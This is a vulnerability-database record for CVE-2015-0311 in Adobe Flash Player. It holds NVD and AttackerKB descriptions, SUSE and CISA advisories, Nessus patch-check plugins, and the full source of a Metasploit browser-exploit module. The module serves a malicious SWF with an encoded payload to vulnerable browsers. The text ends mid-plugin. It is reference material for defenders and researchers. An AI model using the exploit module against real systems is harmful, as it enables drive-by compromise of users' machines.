{"attackerkb": [{"lastseen": "2020-11-22T06:21:50", "bulletinFamily": "info", "cvelist": ["CVE-2015-0311"], "description": "Unspecified vulnerability in Adobe Flash Player through 13.0.0.262 and 14.x, 15.x, and 16.x through 16.0.0.287 on Windows and OS X and through 11.2.202.438 on Linux allows remote attackers to execute arbitrary code via unknown vectors, as exploited in the wild in January 2015.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at November 22, 2020 3:46am UTC reported:\n\nReported as exploited in the wild as part of Google\u2019s 2020 0day vulnerability spreadsheet they made available at <https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>. Original tweet announcing this spreadsheet with the 2020 findings can be found at <https://twitter.com/maddiestone/status/1329837665378725888>\n", "modified": "2020-07-30T00:00:00", "published": "2015-01-23T00:00:00", "id": "AKB:BDDA4B10-E45B-4921-9358-9D6BA5D36119", "href": "https://attackerkb.com/topics/5k9swtQda0/cve-2015-0311", "type": "attackerkb", "title": "CVE-2015-0311", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2020-12-09T20:02:59", "description": "Unspecified vulnerability in Adobe Flash Player through 13.0.0.262 and 14.x, 15.x, and 16.x through 16.0.0.287 on Windows and OS X and through 11.2.202.438 on Linux allows remote attackers to execute arbitrary code via unknown vectors, as exploited in the wild in January 2015.", "edition": 5, "cvss3": {}, "published": "2015-01-23T21:59:00", "title": "CVE-2015-0311", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0311"], "modified": "2015-02-14T03:00:00", "cpe": ["cpe:/a:adobe:flash_player:15.0.0.246", "cpe:/a:adobe:flash_player:16.0.0.287", "cpe:/a:adobe:flash_player:16.0.0.257", "cpe:/a:adobe:flash_player:16.0.0.235", "cpe:/a:adobe:flash_player:14.0.0.145", "cpe:/a:adobe:flash_player:15.0.0.167", "cpe:/a:adobe:flash_player:14.0.0.176", "cpe:/a:adobe:flash_player:15.0.0.152", "cpe:/a:adobe:flash_player:11.2.202.438", "cpe:/a:adobe:flash_player:15.0.0.223", "cpe:/a:adobe:flash_player:14.0.0.179", "cpe:/a:adobe:flash_player:15.0.0.239", "cpe:/a:adobe:flash_player:15.0.0.189", "cpe:/a:adobe:flash_player:14.0.0.125", "cpe:/a:adobe:flash_player:13.0.0.262"], "id": "CVE-2015-0311", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0311", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:15.0.0.189:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.438:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.257:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.125:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.167:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.287:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.152:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.246:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.176:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:13.0.0.262:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.179:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.239:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.145:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.223:*:*:*:*:*:*:*"]}], "suse": [{"lastseen": "2016-09-04T11:38:24", "bulletinFamily": "unix", "cvelist": ["CVE-2015-0311"], "description": 
"Adobe Flash Player was updated to 11.2.202.440 (bsc#914463, APSA15-01,\n CVE-2015-0311).\n\n More information can be found on\n <a rel=\"nofollow\" href=\"https://helpx.adobe.com/security/products/flash-player/apsa15-01.html\">https://helpx.adobe.com/security/products/flash-player/apsa15-01.html</a>\n\n An update of flashplayer (executable binary) for i386 is currently not\n available. Disabled!\n\n", "edition": 1, "modified": "2015-01-27T10:05:24", "published": "2015-01-27T10:05:24", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-01/msg00026.html", "id": "OPENSUSE-SU-2015:0150-1", "title": "Security update for flash-player (critical)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:56:37", "bulletinFamily": "unix", "cvelist": ["CVE-2015-0311"], "description": "Adobe Flash Player was updated to 11.2.202.440 (bsc#914463, APSA15-01,\n CVE-2015-0311).\n\n More information can be found on\n <a rel=\"nofollow\" href=\"https://helpx.adobe.com/security/products/flash-player/apsa15-01.html\">https://helpx.adobe.com/security/products/flash-player/apsa15-01.html</a>\n\n An update of flashplayer (executable binary) for i386 is currently not\n available. 
Disabled!\n\n", "edition": 1, "modified": "2015-01-27T14:04:56", "published": "2015-01-27T14:04:56", "id": "SUSE-SU-2015:0151-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-01/msg00027.html", "type": "suse", "title": "Security update for flash-player (critical)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:07:45", "bulletinFamily": "unix", "cvelist": ["CVE-2015-0311"], "description": "Adobe Flash Player was updated to version 11.2.202.440 (bsc#914463,\n APSA15-01, CVE-2015-0311).\n\n More information can be found at\n <a rel=\"nofollow\" href=\"https://helpx.adobe.com/security/products/flash-player/apsa15-01.html\">https://helpx.adobe.com/security/products/flash-player/apsa15-01.html</a>\n <<a rel=\"nofollow\" href=\"https://helpx.adobe.com/security/products/flash-player/apsa15-01.html\">https://helpx.adobe.com/security/products/flash-player/apsa15-01.html</a>> .\n\n An update of flashplayer (executable binary) for i386 is currently not\n available and was thus disabled.\n\n Security Issues:\n\n * CVE-2015-0311\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0311\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0311</a>>\n\n", "edition": 1, "modified": "2015-01-28T19:08:21", "published": "2015-01-28T19:08:21", "id": "SUSE-SU-2015:0163-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-01/msg00031.html", "type": "suse", "title": "Security update for flash-player (critical)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:46:24", "bulletinFamily": "unix", "cvelist": ["CVE-2015-0303", "CVE-2015-0305", "CVE-2015-0304", "CVE-2015-0308", "CVE-2015-0301", "CVE-2015-0309", "CVE-2015-0302", "CVE-2015-0311", "CVE-2015-0307", "CVE-2015-0306", "CVE-2015-0310"], "edition": 1, "description": "Adobe Flash Player was updated to 
11.2.202.440 (bsc#914463):\n * APSA15-01, CVE-2015-0311\n - Update of flashplayer (executable binary) for i386 is not available.\n This binary was disabled.\n\n - Security update to 11.2.202.438 (bsc#914333):\n * APSB15-02, CVE-2015-0310\n\n - Security update to 11.2.202.429 (bsc#913057):\n * APSB15-01, CVE-2015-0301, CVE-2015-0302, CVE-2015-0303, CVE-2015-0304,\n CVE-2015-0305, CVE-2015-0306, CVE-2015-0307, CVE-2015-0308,\n CVE-2015-0309.\n - Disable flash player on machines without SSE2 (bnc#856386).\n - Remove outdated README and keep only up-to-date readme.txt.\n\n", "modified": "2015-01-29T14:04:51", "published": "2015-01-29T14:04:51", "id": "OPENSUSE-SU-2015:0174-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-01/msg00034.html", "title": "Security update for flash-player (critical)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cisa": [{"lastseen": "2020-12-18T18:07:58", "bulletinFamily": "info", "cvelist": ["CVE-2015-0311"], "description": "Adobe has released Flash Player desktop version 16.0.0.296 to address a critical vulnerability ([CVE-2015-0311](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0311>)) in 16.0.0.287 and earlier versions for Windows and Macintosh. 
This vulnerability could allow an attacker to take control of the affected system.\n\nUsers and administrators are encouraged to review Adobe Security Bulletin [APSB15-01](<http://helpx.adobe.com/security/products/flash-player/apsa15-01.html>) and apply the necessary updates.\n", "modified": "2015-01-26T00:00:00", "published": "2015-01-26T00:00:00", "id": "CISA:A9E57108EE62842BE32ACEED1F317122", "href": "https://us-cert.cisa.gov/ncas/current-activity/2015/01/26/Security-Advisory-Adobe-Flash-Player", "type": "cisa", "title": "Security Advisory for Adobe Flash Player", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-10-07T23:57:39", "description": "This module exploits a use after free vulnerability in Adobe Flash Player. The vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, when trying to uncompress() a malformed byte stream. This module has been tested successfully on: * Windows 7 SP1 (32 bits), IE 8 to IE 11 and Flash 16.0.0.287, 16.0.0.257 and 16.0.0.235. * Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 16.0.0.287. * Windows 8.1, Firefox 38.0.5 and Adobe Flash 16.0.0.305. 
* Linux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Flash 11.2.202.424.\n", "published": "2015-05-20T23:57:59", "type": "metasploit", "title": "Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-0311"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/MULTI/BROWSER/ADOBE_FLASH_UNCOMPRESS_ZLIB_UAF", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::BrowserExploitServer\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free',\n 'Description' => %q{\n This module exploits a use after free vulnerability in Adobe Flash Player. The\n vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, when trying\n to uncompress() a malformed byte stream. 
This module has been tested successfully\n on:\n * Windows 7 SP1 (32 bits), IE 8 to IE 11 and Flash 16.0.0.287, 16.0.0.257 and 16.0.0.235.\n * Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 16.0.0.287.\n * Windows 8.1, Firefox 38.0.5 and Adobe Flash 16.0.0.305.\n * Linux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Flash 11.2.202.424.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown', # Vulnerability discovery and exploit in the wild\n 'hdarwin', # Public exploit by @hdarwin89\n 'juan vazquez' # msf module\n ],\n 'References' =>\n [\n ['CVE', '2015-0311'],\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa15-01.html'],\n ['URL', 'http://blog.hacklab.kr/flash-cve-2015-0311-%EB%B6%84%EC%84%9D/'],\n ['URL', 'http://blog.coresecurity.com/2015/03/04/exploiting-cve-2015-0311-a-use-after-free-in-adobe-flash-player/']\n ],\n 'Payload' =>\n {\n 'DisableNops' => true\n },\n 'Platform' => ['win', 'linux'],\n 'Arch' => [ARCH_X86],\n 'BrowserRequirements' =>\n {\n :source => /script|headers/i,\n :arch => ARCH_X86,\n :os_name => lambda do |os|\n os =~ OperatingSystems::Match::LINUX ||\n os =~ OperatingSystems::Match::WINDOWS_7 ||\n os =~ OperatingSystems::Match::WINDOWS_81\n end,\n :ua_name => lambda do |ua|\n case target.name\n when 'Windows'\n return true if [Msf::HttpClients::IE, Msf::HttpClients::FF].include?(ua)\n when 'Linux'\n return true if ua == Msf::HttpClients::FF\n end\n\n false\n end,\n :flash => lambda do |ver|\n case target.name\n when 'Windows'\n return true if ver =~ /^16\\./ && Gem::Version.new(ver) <= Gem::Version.new('16.0.0.287')\n when 'Linux'\n return true if ver =~ /^11\\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.438')\n end\n\n false\n end\n },\n 'Targets' =>\n [\n [ 'Windows',\n {\n 'Platform' => 'win'\n }\n ],\n [ 'Linux',\n {\n 'Platform' => 'linux'\n }\n ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => '2014-04-28',\n 'DefaultTarget' => 0))\n end\n\n def exploit\n @swf = create_swf\n\n 
super\n end\n\n def on_request_exploit(cli, request, target_info)\n print_status(\"Request: #{request.uri}\")\n\n if request.uri =~ /\\.swf$/\n print_status('Sending SWF...')\n send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})\n return\n end\n\n print_status('Sending HTML...')\n send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})\n end\n\n def exploit_template(cli, target_info)\n swf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\"\n target_payload = get_payload(cli, target_info)\n b64_payload = Rex::Text.encode_base64(target_payload)\n os_name = target_info[:os_name]\n\n if target.name =~ /Windows/\n platform_id = 'win'\n elsif target.name =~ /Linux/\n platform_id = 'linux'\n end\n\n html_template = %Q|<html>\n <body>\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\n <param name=\"movie\" value=\"<%=swf_random%>\" />\n <param name=\"allowScriptAccess\" value=\"always\" />\n <param name=\"FlashVars\" value=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" />\n <param name=\"Play\" value=\"true\" />\n <embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" Play=\"true\"/>\n </object>\n </body>\n </html>\n |\n\n return html_template, binding()\n end\n\n def create_swf\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0311', 'msf.swf')\n swf = ::File.open(path, 'rb') { |f| swf = f.read }\n\n swf\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb"}], "nessus": [{"lastseen": 
"2020-06-05T11:12:28", "description": "Adobe Flash Player was updated to 11.2.202.440 (bsc#914463, APSA15-01,\nCVE-2015-0311).\n\nMore information can be found on\nhttps://helpx.adobe.com/security/products/flash-player/apsa15-01.html\n\nAn update of flashplayer (executable binary) for i386 is currently not\navailable. Disabled!", "edition": 17, "published": "2015-01-28T00:00:00", "title": "openSUSE Security Update : flash-player (openSUSE-SU-2015:0150-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0311"], "modified": "2015-01-28T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:flash-player-kde4", "p-cpe:/a:novell:opensuse:flash-player-gnome", "cpe:/o:novell:opensuse:13.2", "p-cpe:/a:novell:opensuse:flash-player", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2015-78.NASL", "href": "https://www.tenable.com/plugins/nessus/81030", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-78.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81030);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/04\");\n\n script_cve_id(\"CVE-2015-0311\");\n\n script_name(english:\"openSUSE Security Update : flash-player (openSUSE-SU-2015:0150-1)\");\n script_summary(english:\"Check for the openSUSE-2015-78 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Adobe Flash Player was updated to 11.2.202.440 (bsc#914463, APSA15-01,\nCVE-2015-0311).\n\nMore information can be found on\nhttps://helpx.adobe.com/security/products/flash-player/apsa15-01.html\n\nAn update of flashplayer (executable binary) for i386 is currently not\navailable. 
Disabled!\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=914463\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://helpx.adobe.com/security/products/flash-player/apsa15-01.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2015-01/msg00082.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-player packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1|SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1 / 13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-11.2.202.440-94.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-gnome-11.2.202.440-94.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-kde4-11.2.202.440-94.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-11.2.202.440-2.29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-gnome-11.2.202.440-2.29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-kde4-11.2.202.440-2.29.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player / flash-player-gnome / flash-player-kde4\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:41:19", 
"description": "Adobe reports :\n\nSuccessful exploitation could cause a crash and potentially allow an\nattacker to take control of the affected system. We are aware of\nreports that this vulnerability is being actively exploited in the\nwild via drive-by-download attacks against systems running Internet\nExplorer and Firefox on Windows 8.1 and below.", "edition": 21, "published": "2015-01-27T00:00:00", "title": "FreeBSD : Adobe Flash Player -- critical vulnerability (37a87ade-a59f-11e4-958e-0011d823eebd)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0311"], "modified": "2015-01-27T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:linux-f10-flashplugin", "p-cpe:/a:freebsd:freebsd:linux-c6-flashplugin"], "id": "FREEBSD_PKG_37A87ADEA59F11E4958E0011D823EEBD.NASL", "href": "https://www.tenable.com/plugins/nessus/81009", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. 
Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81009);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-0311\");\n\n script_name(english:\"FreeBSD : Adobe Flash Player -- critical vulnerability (37a87ade-a59f-11e4-958e-0011d823eebd)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Adobe reports :\n\nSuccessful exploitation could cause a crash and potentially allow an\nattacker to take control of the affected system. 
We are aware of\nreports that this vulnerability is being actively exploited in the\nwild via drive-by-download attacks against systems running Internet\nExplorer and Firefox on Windows 8.1 and below.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://helpx.adobe.com/security/products/flash-player/apsa15-01.html\"\n );\n # https://vuxml.freebsd.org/freebsd/37a87ade-a59f-11e4-958e-0011d823eebd.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c4c162d5\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-c6-flashplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-f10-flashplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"linux-c6-flashplugin<=11.2r202.438\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-f10-flashplugin<=11.2r202.438\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T14:17:17", "description": "Adobe Flash Player was updated to version 11.2.202.440 (bsc#914463,\nAPSA15-01, CVE-2015-0311).\n\nMore information can be found at\nhttps://helpx.adobe.com/security/products/flash-player/apsa15-01.html\n.\n\nAn update of flashplayer (executable binary) for i386 is currently not\navailable and was thus disabled.", "edition": 23, "published": "2015-01-29T00:00:00", "title": "SuSE 11.3 Security Update : flash-player (SAT Patch Number 10226)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0311"], "modified": "2015-01-29T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:flash-player-gnome", "p-cpe:/a:novell:suse_linux:11:flash-player-kde4", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:flash-player"], "id": "SUSE_11_FLASH-PLAYER-150127.NASL", "href": "https://www.tenable.com/plugins/nessus/81077", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The 
